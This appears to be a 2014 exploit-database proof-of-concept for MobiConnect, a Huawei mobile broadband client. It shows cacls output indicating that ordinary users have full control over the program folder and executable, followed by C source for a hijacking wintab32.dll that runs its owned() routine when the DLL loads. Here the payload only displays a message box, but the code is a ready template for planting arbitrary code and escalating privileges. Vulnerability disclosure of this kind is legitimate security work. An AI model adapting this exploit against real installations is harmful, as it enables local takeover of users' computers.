/* * Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll) * Date: 25/12/2014 * Author: Hadji Samir s-dz@hotmail.fr * Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php * Vendor: http://www.huawei.com/ * Tested on: windows 7 FR ##################### Insecure Permissions Local Privilege Escalation #################### C:\Program Files>cacls "MobiConnect" C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F BUILTIN\Utilisateurs:(CI)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F AUTORITE NT\Syst�me:(ID)F AUTORITE NT\Syst�me:(OI)(CI)(IO)(ID)F BUILTIN\Administrateurs:(ID)F BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F C:\Program Files\MobiConnect>cacls "MobiConnect.exe" C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F AUTORITE NT\Syst�me:(ID)F BUILTIN\Administrateurs:(ID)F ########################DLL Hijacking Exploit (wintab32.dll)######################### */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK); }